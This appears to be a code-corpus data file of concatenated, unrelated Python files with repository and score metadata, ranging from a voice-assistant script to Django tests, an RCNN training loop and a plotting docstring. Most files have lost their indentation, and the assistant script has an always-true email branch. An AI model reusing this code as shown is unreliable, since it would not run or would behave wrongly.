for subreddit in subreddit_list:
sform = sub_form()
sform.sub_name = subreddit.name
sform.sub_group = subreddit.group
if g.user:
sform.value=subreddit.name in g.user.subreddit_subs['subs']
form.subs.append_entry(sform)
return render_template('subreddits/subs.html',
cur_subreddit=None,
page_title='subs',
form=form,
subreddit_list=subreddit_list)
| 2.296875 | 2 |
Jarvis.py | vijayeshmt/Securitylock | 1 | 1282 | import pyttsx3
import datetime
import speech_recognition as sr
import wikipedia
import webbrowser
import os
import smtplib
engine = pyttsx3.init('sapi5')
voices = engine.getProperty('voices')
engine.setProperty('voice', voices[0].id)
# To change the voice to female change 0 to 1.
def speak(audio):
engine.say(audio)
engine.runAndWait()
pass
def take_command():
"""
It takes microphone input from the user and returns a string
:return:
"""
r = sr.Recognizer()
with sr.Microphone() as source:
print("Listening...")
r.pause_threshold = 1.5 # It will wait 1.5 seconds to complete a sentence
audio = r.listen(source)
#Do read details
try:
print("Recognizing")
query = r.recognize_google(audio,language='en-in')
print(f'user said : {query}\n')
except Exception as e:
#print(e)
print("Say that again please")
return "None"
return query
def sendEmail(to,content):
    server = smtplib.SMTP('smtp.gmail.com', 587)  # Gmail SMTP uses port 587 with STARTTLS
    server.ehlo()
    server.starttls()
server.login('<EMAIL>','########')
server.sendmail('<EMAIL>',to,content)
server.close()
def wish_me():
hour = int(datetime.datetime.now().hour)
if hour >= 0 and hour < 12:
speak("Good morning")
elif hour >= 12 and hour < 18:
speak("Good afternoon")
else:
speak("Good night")
speak("I am JARVIS how can i help you")
if __name__ == '__main__':
wish_me()
while True:
query =take_command().lower()
if 'wikipedia' in query:
speak("Searching wikipedia")
query = query.replace('wikipedia','')
            results = wikipedia.summary(query, sentences=2)  # Increase 'sentences' to read more of the summary, decrease it to read less
speak("According to wikipedia")
#print(results)
speak(results)
elif 'open youtube' in query:
# webbrowser.Chrome.open_new("youtube.com")
webbrowser.open("youtube.com")
elif "open google" in query:
webbrowser.open("google.com")
elif "play music" in query:
music_dir = "D:\\vijayesh\\music"
songs = os.listdir(music_dir)
print(songs)
os.startfile(os.path.join(music_dir,songs[1]))
elif "the time" in query:
strtime = datetime.datetime.now().strftime("%H:%M:%S")
speak(f"The time is {strtime}")
elif " open pycharm" in query:
pycharmpath ="C:\\Program Files\\JetBrains\\PyCharm Community Edition 2021"
os.startfile(pycharmpath)
#elif "open command" in query:
# filelocation = "path of the particular file like above"
# os.startfile(filelocation)
elif " email to vijayesh" or "email to vijesh" in query:
try:
speak("What should i say")#error present
content = take_command()
to = "<EMAIL>"
sendEmail(to,content)
speak("Email has been sent")
exit()
except Exception as e:
print(e)
speak("Sorry,I am not able to send this email")
exit()
| 3.453125 | 3 |
clients/kratos/python/test/test_v0alpha1_api.py | kolotaev/sdk | 0 | 1283 | """
Ory Kratos API
    Documentation for all public and administrative Ory Kratos APIs. Public and administrative APIs are exposed on different ports. Public APIs can face the public internet without any protection while administrative APIs should never be exposed without prior authorization. To protect the administrative API port you should use something like Nginx, Ory Oathkeeper, or any other technology capable of authorizing incoming requests. # noqa: E501
The version of the OpenAPI document: v0.7.0-alpha.1
Contact: <EMAIL>
Generated by: https://openapi-generator.tech
"""
import unittest
import ory_kratos_client
from ory_kratos_client.api.v0alpha1_api import V0alpha1Api # noqa: E501
class TestV0alpha1Api(unittest.TestCase):
"""V0alpha1Api unit test stubs"""
def setUp(self):
self.api = V0alpha1Api() # noqa: E501
def tearDown(self):
pass
def test_admin_create_identity(self):
"""Test case for admin_create_identity
Create an Identity # noqa: E501
"""
pass
def test_admin_create_self_service_recovery_link(self):
"""Test case for admin_create_self_service_recovery_link
Create a Recovery Link # noqa: E501
"""
pass
def test_admin_delete_identity(self):
"""Test case for admin_delete_identity
Delete an Identity # noqa: E501
"""
pass
def test_admin_get_identity(self):
"""Test case for admin_get_identity
Get an Identity # noqa: E501
"""
pass
def test_admin_list_identities(self):
"""Test case for admin_list_identities
List Identities # noqa: E501
"""
pass
def test_admin_update_identity(self):
"""Test case for admin_update_identity
Update an Identity # noqa: E501
"""
pass
def test_create_self_service_logout_flow_url_for_browsers(self):
"""Test case for create_self_service_logout_flow_url_for_browsers
Create a Logout URL for Browsers # noqa: E501
"""
pass
def test_get_json_schema(self):
"""Test case for get_json_schema
"""
pass
def test_get_self_service_error(self):
"""Test case for get_self_service_error
Get Self-Service Errors # noqa: E501
"""
pass
def test_get_self_service_login_flow(self):
"""Test case for get_self_service_login_flow
Get Login Flow # noqa: E501
"""
pass
def test_get_self_service_recovery_flow(self):
"""Test case for get_self_service_recovery_flow
Get Recovery Flow # noqa: E501
"""
pass
def test_get_self_service_registration_flow(self):
"""Test case for get_self_service_registration_flow
Get Registration Flow # noqa: E501
"""
pass
def test_get_self_service_settings_flow(self):
"""Test case for get_self_service_settings_flow
Get Settings Flow # noqa: E501
"""
pass
def test_get_self_service_verification_flow(self):
"""Test case for get_self_service_verification_flow
Get Verification Flow # noqa: E501
"""
pass
def test_initialize_self_service_login_flow_for_browsers(self):
"""Test case for initialize_self_service_login_flow_for_browsers
Initialize Login Flow for Browsers # noqa: E501
"""
pass
def test_initialize_self_service_login_flow_without_browser(self):
"""Test case for initialize_self_service_login_flow_without_browser
Initialize Login Flow for APIs, Services, Apps, ... # noqa: E501
"""
pass
def test_initialize_self_service_recovery_flow_for_browsers(self):
"""Test case for initialize_self_service_recovery_flow_for_browsers
Initialize Recovery Flow for Browsers # noqa: E501
"""
pass
def test_initialize_self_service_recovery_flow_without_browser(self):
"""Test case for initialize_self_service_recovery_flow_without_browser
Initialize Recovery Flow for APIs, Services, Apps, ... # noqa: E501
"""
pass
def test_initialize_self_service_registration_flow_for_browsers(self):
"""Test case for initialize_self_service_registration_flow_for_browsers
Initialize Registration Flow for Browsers # noqa: E501
"""
pass
def test_initialize_self_service_registration_flow_without_browser(self):
"""Test case for initialize_self_service_registration_flow_without_browser
Initialize Registration Flow for APIs, Services, Apps, ... # noqa: E501
"""
pass
def test_initialize_self_service_settings_flow_for_browsers(self):
"""Test case for initialize_self_service_settings_flow_for_browsers
Initialize Settings Flow for Browsers # noqa: E501
"""
pass
def test_initialize_self_service_settings_flow_without_browser(self):
"""Test case for initialize_self_service_settings_flow_without_browser
Initialize Settings Flow for APIs, Services, Apps, ... # noqa: E501
"""
pass
def test_initialize_self_service_verification_flow_for_browsers(self):
"""Test case for initialize_self_service_verification_flow_for_browsers
Initialize Verification Flow for Browser Clients # noqa: E501
"""
pass
def test_initialize_self_service_verification_flow_without_browser(self):
"""Test case for initialize_self_service_verification_flow_without_browser
Initialize Verification Flow for APIs, Services, Apps, ... # noqa: E501
"""
pass
def test_submit_self_service_login_flow(self):
"""Test case for submit_self_service_login_flow
Submit a Login Flow # noqa: E501
"""
pass
def test_submit_self_service_logout_flow(self):
"""Test case for submit_self_service_logout_flow
Complete Self-Service Logout # noqa: E501
"""
pass
def test_submit_self_service_logout_flow_without_browser(self):
"""Test case for submit_self_service_logout_flow_without_browser
Perform Logout for APIs, Services, Apps, ... # noqa: E501
"""
pass
def test_submit_self_service_recovery_flow(self):
"""Test case for submit_self_service_recovery_flow
Complete Recovery Flow # noqa: E501
"""
pass
def test_submit_self_service_registration_flow(self):
"""Test case for submit_self_service_registration_flow
Submit a Registration Flow # noqa: E501
"""
pass
def test_submit_self_service_settings_flow(self):
"""Test case for submit_self_service_settings_flow
Complete Settings Flow # noqa: E501
"""
pass
def test_submit_self_service_verification_flow(self):
"""Test case for submit_self_service_verification_flow
Complete Verification Flow # noqa: E501
"""
pass
def test_to_session(self):
"""Test case for to_session
Check Who the Current HTTP Session Belongs To # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
| 2.140625 | 2 |
osrsapi/__init__.py | XaKingas/osrsapi | 0 | 1284 | from .grandexchange import GrandExchange, GameItemNotFound, GameItemParseError
from .item import Item
from .priceinfo import PriceInfo
from .pricetrend import PriceTrend
| 1.25 | 1 |
utils/data_loader.py | dilum1995/DAugmentor | 1 | 1285 | <gh_stars>1-10
import pandas as pd
import os
import numpy as np
import cv2
from utils import constants as const
import matplotlib.pyplot as plt
class DataLoader:
def load_data():
'''
        Handles the data loading and pre-processing.
:return: (xtrain, ytrain), (xtest, ytest)
'''
print('**** Read data into DAugmentor ****')
x_train = []
y_train = []
x_test = []
y_test = []
# setting the path to metadata
path = const.PATH
metadata_csv_path = os.path.join(path, const.FILE_METADATA)
test_img_dir_path = os.path.join(path, const.DIR_TEST)
train_img_dir_path = os.path.join(path, const.DIR_TRAIN)
print(metadata_csv_path)
# setting the path to train data
x_train_path = os.path.join(path, const.DIR_TRAIN)
print(x_train_path)
# setting the path to train data
x_test_path = os.path.join(path, const.DIR_TEST)
# reading meta data file as dataframe
df = pd.read_csv(metadata_csv_path, delimiter=',')
# dataset format:
# image_name
# label
# data_type
data_type_row = df["data_type"].tolist()
image_row = df["image_name"].tolist()
label_row = df["label"].tolist()
data_rows = len(data_type_row)
for row in range(data_rows):
if (data_type_row[row] == "TRAIN"):
# setting the path of the current image
img_path = os.path.join(train_img_dir_path, image_row[row])
# reading image
image = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)
                # downscaling image to 128x128
image = cv2.resize(image, (128, 128))
x_train.append(image)
print("Loaded: " + img_path)
# extracting labels
y_train.append(label_row[row])
if (data_type_row[row] == "TEST"):
# setting the path of the current image
img_path = os.path.join(test_img_dir_path, image_row[row])
# reading image
image = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)
                # downscaling image to 128x128
image = cv2.resize(image, (128, 128))
x_test.append(image)
print("Loaded: " + img_path)
# extracting labels
y_test.append(label_row[row])
xtrain = np.asarray(x_train)
ytrain = np.asarray(y_train)
xtest = np.asarray(x_test)
ytest = np.asarray(y_test)
print(x_train[0].shape)
print(x_train[0].shape)
print(xtrain[0].shape)
print(x_test[0].shape)
#(X_train, y_train), (X_test, y_test)
        return (xtrain, ytrain), (xtest, ytest)
| 3.203125 | 3 |
CompilerPython/LexerPython/main.py | valternunez/Compiler | 0 | 1286 | <filename>CompilerPython/LexerPython/main.py
from lexer import *
import sys
if len(sys.argv) != 2:
print("usage: main.py file")
else:
lex = Lexer(sys.argv[1])
with open(sys.argv[1]) as f:
while True:
c = f.read(1)
if not c:
break
print(lex.scan().toString())
| 2.984375 | 3 |
cms/tests/test_views.py | Ibrahem3amer/bala7 | 0 | 1287 | <reponame>Ibrahem3amer/bala7<filename>cms/tests/test_views.py
from django.core.urlresolvers import resolve
from django.urls import reverse
from django.test import TestCase, RequestFactory
from django.http import HttpRequest, Http404
from django.contrib.auth.models import User
from unittest import skip
from users.models import University, Faculty, Department, UserProfile
from cms.models import Topic
from cms.views import get_topic
class AccessRestriction(TestCase):
def setUp(self):
self.user = User.objects.create(username='test_username', email='<EMAIL>', password='<PASSWORD>')
self.uni = University.objects.create(name='test_university')
self.fac = Faculty.objects.create(name='Test faculty')
self.dep = Department.objects.create(name='Test dep')
self.profile = UserProfile.objects.create(university=self.uni, faculty=self.fac, department=self.dep)
self.topic = Topic.objects.create(name='cs', desc="test test test", faculty=self.fac, term=1)
self.topic.department.add(self.dep)
self.user.profile = self.profile
self.profile.topics.add(self.topic)
def test_return_topic_that_match_user(self):
# Setup test
request = RequestFactory()
request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id}))
request.user = self.user
# Exercise test
response = get_topic(request, self.dep.id, self.topic.id)
# Assert test
self.assertEqual(200, response.status_code)
def test_return_topic_that_has_different_department(self):
# Setup test
request = RequestFactory()
request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id}))
request.user = self.user
# Exercise test
another_dep = Department.objects.create()
try:
response = get_topic(request, another_dep.id, self.topic.id)
flag = False
except Http404:
flag = True
# Assert test
self.assertTrue(flag)
def test_return_topic_that_does_not_exist(self):
# Setup test
request = RequestFactory()
request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id}))
request.user = self.user
# Exercise test
try:
response = get_topic(request, self.dep.id, 990)
flag = False
except Http404:
flag = True
# Assert test
self.assertTrue(flag)
def test_return_topic_that_outside_user_topics(self):
# Setup test
another_topic = Topic.objects.create(name='is', desc="test test test", faculty=self.fac, term=1)
another_topic.department.add(self.dep)
self.user.profile.topics.add(another_topic)
request = RequestFactory()
request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id}))
request.user = self.user
# Exercise test
outsider_topic = Topic.objects.create(name='ms', desc="test test test", faculty=self.fac, term=1)
outsider_topic.department.add(self.dep)
try:
response = get_topic(request, self.dep.id, outsider_topic.id)
flag = False
except Http404:
flag = True
# Assert test
self.assertTrue(flag)
def test_get_topic_with_no_parameters(self):
# Setup test
another_topic = Topic.objects.create(name='is', desc="test test test", faculty=self.fac, term=1)
another_topic.department.add(self.dep)
self.user.profile.topics.add(another_topic)
request = RequestFactory()
request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id}))
request.user = self.user
# Exercise test
outsider_topic = Topic.objects.create(name='ms', desc="test test test", faculty=self.fac, term=1)
outsider_topic.department.add(self.dep)
try:
response = get_topic(request)
flag = False
except Http404:
flag = True
# Assert test
self.assertTrue(flag)
class TableViews(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>')
self.fac = Faculty.objects.create()
self.dep = Department.objects.create(faculty=self.fac)
self.profile = UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac)
def test_page_load_on_get(self):
# Setup test
url = reverse('web_dep_table')
request = self.client.login(username="ssss", password="<PASSWORD>")
# Exercise test
request = self.client.get(url)
# Assert test
self.assertEqual(200, request.status_code)
self.assertTemplateUsed(request, 'tables/table_main.html')
def test_page_redirect_on_post(self):
# Setup test
url = reverse('web_dep_table')
request = self.client.login(username="ssss", password="<PASSWORD>")
# Exercise test
request = self.client.post(url)
# Assert test
self.assertEqual(302, request.status_code)
def test_page_redirect_on_no_profile(self):
# Setup test
user = User.objects.create_user(
username='test_username',
email='<EMAIL>',
password='<PASSWORD>'
)
url = reverse('web_dep_table')
request = self.client.login(username="test_username", password="<PASSWORD>")
# Exercise test
request = self.client.get(url)
# Assert test
self.assertEqual(302, request.status_code)
class UserTableViews(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>')
self.fac = Faculty.objects.create()
self.dep = Department.objects.create(faculty=self.fac)
UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac)
self.topic = Topic.objects.create(name='topic name', desc='ddddd', term=1)
self.topic.department.add(self.dep)
def test_page_load_on_get(self):
# Setup test
url = reverse('web_user_table')
request = self.client.login(username="ssss", password="<PASSWORD>")
# Exercise test
request = self.client.get(url)
# Assert test
self.assertEqual(200, request.status_code)
self.assertTemplateUsed(request, 'tables/user_table.html')
def test_page_load_if_no_profile(self):
# Setup test
url = reverse('web_user_table')
another_user = User.objects.create_user(username='xxxss', email='<EMAIL>', password='<PASSWORD>')
request = self.client.login(username="xxxss", password="<PASSWORD>")
# Exercise test
request = self.client.get(url)
# Assert test
self.assertEqual(200, request.status_code)
self.assertTemplateUsed(request, 'tables/user_table.html')
def test_post_when_no_choices(self):
# Setup test
url = reverse('web_user_table')
data = {}
request = self.client.login(username="xxxss", password="<PASSWORD>")
# Exercise test
request = self.client.post(url, data=data)
# Assert test
self.assertEqual(302, request.status_code)
| 2.390625 | 2 |
3D/Train_Module_3D.py | geometatqueens/RCNN | 1 | 1288 | """The present code is the Version 1.0 of the RCNN approach to perform MPS
in 3D for categorical variables. It has been developed by <NAME> and <NAME> in the
Geometallurygical Group at Queen's University as part of a PhD program.
The code is not free of bugs but running end-to-end.
Any comments and further improvements are well recevied to: <EMAIL>
April 16, 2019.
Geomet Group - Queen's University - Canada"""
# Do not display the AVX message about using GPU
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
#from tensorflow.python.client import device_lib
#print(device_lib.list_local_devices())
#os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID" # see issue #152
#os.environ["CUDA_VISIBLE_DEVICES"]="0"
## #########################
import numpy as np
import tensorflow as tf
import time
import External_Functions_3D as fns_nested
import gc
for ind0 in range(1):
start_time_AllTrain = time.time()
HyperPar = []
HyperPar.append(50) # SGsizex - Num 0
HyperPar.append(50) # SGsizey - Num 1
HyperPar.append(50) # SGsizez - Num 2
HyperPar.append(int(7)) # Search_x - Num 3
HyperPar.append(int(7)) # Search_y - Num 4
HyperPar.append(int(7)) # Search_z - Num 5
HyperPar.append(int(7)) # IPsizex - Num 6
HyperPar.append(int(7)) # IPsizey - Num 7
HyperPar.append(int(7)) # IPsizez - Num 8
HyperPar.append(50) # Percentage of Data Conditioning - Num 9 .. divided by 3 so 1% is 10 represents 1%
HyperPar.append(1) # MinDC - Num 10
HyperPar.append(1500) # Num Fully Connected - Num 11
HyperPar.append(3) # wdnh - Num 12
HyperPar.append(16) # convdepth - Num 13
HyperPar.append(2) # num of categories - Num 14
print("SG: ", int(HyperPar[3]),"x",int(HyperPar[4]),"x",int(HyperPar[5]), "IP: ", int(HyperPar[6]),"x",int(HyperPar[7]),"x",int(HyperPar[8]))
Ncicles = 500
Nepoch = 1
#Nbatch = 250
Nsamples = 512
TrainingImage = "TI_Collaboration_1of4_50x50x50_newRepresentation.dat"
LocModel = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13]))
#LocModel = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13]))
LocFile = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13]))
#LocFile = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13]))
print("[Graph]")
#fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D_NoBN(HyperPar=HyperPar, LocModel=LocModel)
fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D(HyperPar=HyperPar, LocModel=LocModel)
# To save the TI
TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=3,Training=False, Padding=True)
TempSimGrid.SavePlot(name=LocModel+'_TI.png', Level=1)
MaxLR, MinLR = 0.01, 0.001
StepLR = 10
PointStart = 1
for indTrain in range(Ncicles):
#HyperPar[9] = np.random.randint(41)+10
cuos = indTrain%(2*StepLR)
if cuos < StepLR:
LearningRate = np.around(((MaxLR - MinLR)/StepLR)*cuos + MinLR, decimals=7)
else:
LearningRate = np.around(((MaxLR - MinLR)/StepLR)*(StepLR - cuos) + MaxLR, decimals=7)
start_time_1 = time.time()
print ("Cicle: {}".format(indTrain+PointStart), "Learning Rate: ", LearningRate)
TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=5, Training=True, Padding=True)
print("[Sim]")
TempSimGrid.Simulate_4ConvNets_BN_3D(LocModel=LocModel, Cicle=(indTrain+PointStart), Plot=True)
print("[Saving Grid]")
TempSimGrid.SaveGrid(file="{}/TrainReas_{}.txt".format(LocFile, indTrain+PointStart))
print("[Train]")
TempSimGrid.Train_4ConvNets_BN_3D(Epochs=Nepoch, Num_samples=Nsamples, LocModel=LocModel, LR=LearningRate)
print("--%s seconds of whole training process-" % (np.around((time.time() - start_time_1), decimals=2)))
gc.collect()
print(" ")
print("--%s minutes of ALL training-" % ((time.time() - start_time_AllTrain)/60)) | 2.484375 | 2 |
feature_flags_project/feature_flags/providers.py | steuke/django_feature_flags_example | 0 | 1289 | import logging
from typing import Dict
from django.http import HttpRequest
logger = logging.getLogger(__name__)
class FeatureFlagProvider:
def is_feature_enabled(self, feature_name: str, user_id: str = None, attributes: Dict = None):
raise NotImplementedError("You must override FeatureFlagProvider.is_feature_enabled()")
def _attributes_from_request(request: HttpRequest) -> Dict:
if not request:
return dict()
attributes = dict()
try:
attributes["is_staff"] = request.user.is_staff
return attributes
except Exception:
logger.exception(
"Unexpected exception while trying to parse http-request for feature-attributes."
)
return dict()
def is_feature_enabled(feature_name: str, request: HttpRequest) -> bool:
from django.conf import settings
is_enabled = False
attributes = _attributes_from_request(request)
try:
is_enabled = settings.FEATURE_FLAG_PROVIDER.is_feature_enabled(
feature_name=feature_name, user_id="dontcare", attributes=attributes
)
logger.info(f"Feature '{feature_name}' is enabled={is_enabled}")
except Exception:
logger.exception(f"Exception while trying to check feature-flag state for '{feature_name}'")
return is_enabled
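
# Illustrative provider sketch (an assumption, not defined elsewhere in this
# project): a concrete provider only needs to override is_feature_enabled();
# an instance would then be exposed as settings.FEATURE_FLAG_PROVIDER, which is
# what is_feature_enabled() above looks up.
class StaticFeatureFlagProvider(FeatureFlagProvider):
    """Enable exactly the feature names the provider is constructed with.

    A real provider would typically consult a configuration store or a remote
    feature-flag service instead of a static set.
    """

    def __init__(self, enabled_features=None):
        self._enabled = set(enabled_features or [])

    def is_feature_enabled(self, feature_name: str, user_id: str = None, attributes: Dict = None):
        return feature_name in self._enabled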
| 2.34375 | 2 |
src/app/database/__init__.py | roch1990/aiohttp-blog | 20 | 1290 | <gh_stars>10-100
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
| 1.1875 | 1
src/plottoolbox/functions/kde.py | timcera/plottoolbox | 0 | 1291 | <filename>src/plottoolbox/functions/kde.py
# -*- coding: utf-8 -*-
"""Collection of functions for the manipulation of time series."""
from __future__ import absolute_import, division, print_function
import itertools
import os
import warnings
import mando
import numpy as np
import pandas as pd
from mando.rst_text_formatter import RSTHelpFormatter
from tstoolbox import tsutils
from .. import plotutils
warnings.filterwarnings("ignore")
@mando.command("kde", formatter_class=RSTHelpFormatter, doctype="numpy")
@tsutils.doc(plotutils.ldocstrings)
def kde_cli(
input_ts="-",
columns=None,
start_date=None,
end_date=None,
clean=False,
skiprows=None,
index_type="datetime",
names=None,
ofilename="plot.png",
xtitle="",
ytitle="",
title="",
figsize="10,6.0",
legend=None,
legend_names=None,
subplots=False,
sharex=True,
sharey=False,
colors="auto",
linestyles="auto",
markerstyles=" ",
bar_hatchstyles="auto",
style="auto",
logx=False,
logy=False,
xaxis="arithmetic",
yaxis="arithmetic",
xlim=None,
ylim=None,
secondary_y=False,
mark_right=True,
scatter_matrix_diagonal="kde",
bootstrap_size=50,
bootstrap_samples=500,
norm_xaxis=False,
norm_yaxis=False,
lognorm_xaxis=False,
lognorm_yaxis=False,
xy_match_line="",
grid=False,
label_rotation=None,
label_skip=1,
force_freq=None,
drawstyle="default",
por=False,
invert_xaxis=False,
invert_yaxis=False,
round_index=None,
plotting_position="weibull",
prob_plot_sort_values="descending",
source_units=None,
target_units=None,
lag_plot_lag=1,
plot_styles="bright",
hlines_y=None,
hlines_xmin=None,
hlines_xmax=None,
hlines_colors=None,
hlines_linestyles="-",
vlines_x=None,
vlines_ymin=None,
vlines_ymax=None,
vlines_colors=None,
vlines_linestyles="-",
):
r"""Kernel density estimation of probability density function.
"kde" will create a plot of estimation of the probability density function
based on the data called kernel density estimation (KDE).
{ydata}
Parameters
----------
{input_ts}
ofilename : str
[optional, defaults to 'plot.png']
Output filename for the plot. Extension defines
the type, for example 'filename.png' will create a PNG file.
        If used within Python and `ofilename` is None, the function will
        return the Matplotlib figure so that it can be changed or added to as
        needed.
lag_plot_lag
[optional, default to 1]
The lag used if ``type`` "lag_plot" is chosen.
xtitle : str
[optional, default depends on ``type``]
Title of x-axis.
ytitle : str
[optional, default depends on ``type``]
Title of y-axis.
title : str
[optional, defaults to '']
Title of chart.
figsize : str
        [optional, defaults to '10,6.0']
        The 'width,height' of the plot in inches.
legend
[optional, defaults to True]
Whether to display the legend.
legend_names : str
[optional, defaults to None]
Legend would normally use the time-series names associated with
the input data. The 'legend_names' option allows you to
override the names in the data set. You must supply a comma
separated list of strings for each time-series in the data set.
subplots
[optional, defaults to False]
Make separate subplots for each time series.
sharex
[optional, default to True]
In case subplots=True, share x axis.
sharey
[optional, default to False]
In case subplots=True, share y axis.
colors
[optional, default is 'auto']
The default 'auto' will cycle through matplotlib colors in the chosen
style.
        At the command line supply comma-separated matplotlib
        color codes, or within Python a list of color code strings.
        Colors can be identified in four different ways.
1. Use 'CN' where N is a number from 0 to 9 that gets the Nth color
from the current style.
2. Single character code from the table below.
+------+---------+
| Code | Color |
+======+=========+
| b | blue |
+------+---------+
| g | green |
+------+---------+
| r | red |
+------+---------+
| c | cyan |
+------+---------+
| m | magenta |
+------+---------+
| y | yellow |
+------+---------+
| k | black |
+------+---------+
3. Number between 0 and 1 that represents the level of gray, where 0 is
       white and 1 is black.
4. Any of the HTML color names.
+------------------+
| HTML Color Names |
+==================+
| red |
+------------------+
| burlywood |
+------------------+
| chartreuse |
+------------------+
| ...etc. |
+------------------+
Color reference:
http://matplotlib.org/api/colors_api.html
linestyles
[optional, default to 'auto']
If 'auto' will iterate through the available matplotlib line types.
Otherwise on the command line a comma separated list, or a list of
strings if using the Python API.
To not display lines use a space (' ') as the linestyle code.
        Use the separate 'colors', 'linestyles', and 'markerstyles' options
        instead of the 'style' keyword.
+---------+--------------+
| Code | Lines |
+=========+==============+
| ``-`` | solid |
+---------+--------------+
| -- | dashed |
+---------+--------------+
| -. | dash_dot |
+---------+--------------+
| : | dotted |
+---------+--------------+
| None | draw nothing |
+---------+--------------+
| ' ' | draw nothing |
+---------+--------------+
| '' | draw nothing |
+---------+--------------+
Line reference:
http://matplotlib.org/api/artist_api.html
markerstyles
[optional, default to ' ']
The default ' ' will not plot a marker. If 'auto' will iterate through
the available matplotlib marker types. Otherwise on the command line
a comma separated list, or a list of strings if using the Python API.
Use the separate 'colors', 'linestyles', and 'markerstyles' options
instead of the 'style' keyword.
+-------+----------------+
| Code | Markers |
+=======+================+
| . | point |
+-------+----------------+
| o | circle |
+-------+----------------+
| v | triangle down |
+-------+----------------+
| ^ | triangle up |
+-------+----------------+
| < | triangle left |
+-------+----------------+
| > | triangle right |
+-------+----------------+
| 1 | tri_down |
+-------+----------------+
| 2 | tri_up |
+-------+----------------+
| 3 | tri_left |
+-------+----------------+
| 4 | tri_right |
+-------+----------------+
| 8 | octagon |
+-------+----------------+
| s | square |
+-------+----------------+
| p | pentagon |
+-------+----------------+
| ``*`` | star |
+-------+----------------+
| h | hexagon1 |
+-------+----------------+
| H | hexagon2 |
+-------+----------------+
| ``+`` | plus |
+-------+----------------+
| x | x |
+-------+----------------+
| D | diamond |
+-------+----------------+
| d | thin diamond |
+-------+----------------+
| _ | hline |
+-------+----------------+
| None | nothing |
+-------+----------------+
| ' ' | nothing |
+-------+----------------+
| '' | nothing |
+-------+----------------+
Marker reference:
http://matplotlib.org/api/markers_api.html
style
[optional, default is None]
Still available, but superseded by the separate 'colors', 'linestyles',
and 'markerstyles' options. Currently, if given, the 'style' option
overrides the others.
Comma separated matplotlib style strings per time-series. Just
combine codes in 'ColorMarkerLine' order, for example 'r*--' is
a red dashed line with star marker.
bar_hatchstyles
[optional, default to "auto", only used if type equal to "bar", "barh",
"bar_stacked", and "barh_stacked"]
If 'auto' will iterate through the available matplotlib hatch types.
Otherwise on the command line a comma separated list, or a list of
strings if using the Python API.
+-----------------+-------------------+
| bar_hatchstyles | Description |
+=================+===================+
| / | diagonal hatching |
+-----------------+-------------------+
| ``\`` | back diagonal |
+-----------------+-------------------+
| ``|`` | vertical |
+-----------------+-------------------+
| - | horizontal |
+-----------------+-------------------+
| + | crossed |
+-----------------+-------------------+
| x | crossed diagonal |
+-----------------+-------------------+
| o | small circle |
+-----------------+-------------------+
| O | large circle |
+-----------------+-------------------+
| . | dots |
+-----------------+-------------------+
| * | stars |
+-----------------+-------------------+
logx
DEPRECATED: use '--xaxis="log"' instead.
logy
DEPRECATED: use '--yaxis="log"' instead.
xlim
[optional, default is based on range of x values]
Comma separated lower and upper limits for the x-axis of the
plot. For example, '--xlim 1,1000' would limit the plot from
1 to 1000, where '--xlim ,1000' would base the lower limit on
the data and set the upper limit to 1000.
ylim
[optional, default is based on range of y values]
Comma separated lower and upper limits for the y-axis of the
plot. See `xlim` for examples.
xaxis : str
[optional, default is 'arithmetic']
Defines the type of the xaxis. One of 'arithmetic', 'log'.
yaxis : str
[optional, default is 'arithmetic']
Defines the type of the yaxis. One of 'arithmetic', 'log'.
secondary_y
[optional, default is False]
Whether to plot on the secondary y-axis. If a list/tuple, which
time-series to plot on secondary y-axis.
mark_right
[optional, default is True]
